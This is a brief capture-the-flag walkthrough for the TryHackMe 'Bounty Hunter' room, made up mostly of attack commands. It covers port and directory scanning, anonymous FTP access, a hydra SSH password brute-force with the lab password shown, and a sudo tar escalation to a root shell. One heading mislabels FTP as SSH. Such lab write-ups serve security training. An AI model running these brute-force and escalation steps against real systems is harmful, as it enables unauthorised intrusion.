Bounty Hunter

Room Link: https://tryhackme.com/room/cowboyhacker

Scanning

Initial Scan

nmap -A $VICTIM

Scan all ports

No other ports found.

nmap -p- $VICTIM

TCP/80 - HTTP

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

TCP/22 - SSH

anonymous login works

Kali

ftp $VICTIM
Username: anonymous

Kali

hydra -l lin -P locks.txt ssh://$VICTIM
Username: lin
Password: RedDr4gonSynd1cat3

Kali

ssh lin@$VICTIM

Privlege Escalation

Exploit Link: https://gtfobins.github.io/gtfobins/tar/

Victim

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

PreviousIceNextAgent Sudo

Last updated